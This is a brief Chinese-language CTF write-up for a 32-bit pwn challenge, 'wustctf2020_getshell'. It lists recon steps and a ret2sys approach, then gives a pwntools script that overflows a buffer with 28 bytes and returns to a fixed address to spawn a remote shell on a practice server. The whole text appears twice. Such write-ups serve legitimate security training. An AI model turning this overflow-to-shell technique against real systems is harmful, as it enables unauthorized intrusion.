1,三连
file+checksec+执行2,偏移
3,
思路:ret2sys
4,payload
#io = process("./wustctf2020_getshell")
io = remote("node4.buuoj.cn",27852)
ret = 0x08048524
payload =b'a'*28 + p32(ret)
io.recv()
io.sendline(payload)
io.interactive()
1,三连
file+checksec+执行2,偏移
3,
思路:ret2sys
4,payload
#io = process("./wustctf2020_getshell")
io = remote("node4.buuoj.cn",27852)
ret = 0x08048524
payload =b'a'*28 + p32(ret)
io.recv()
io.sendline(payload)
io.interactive()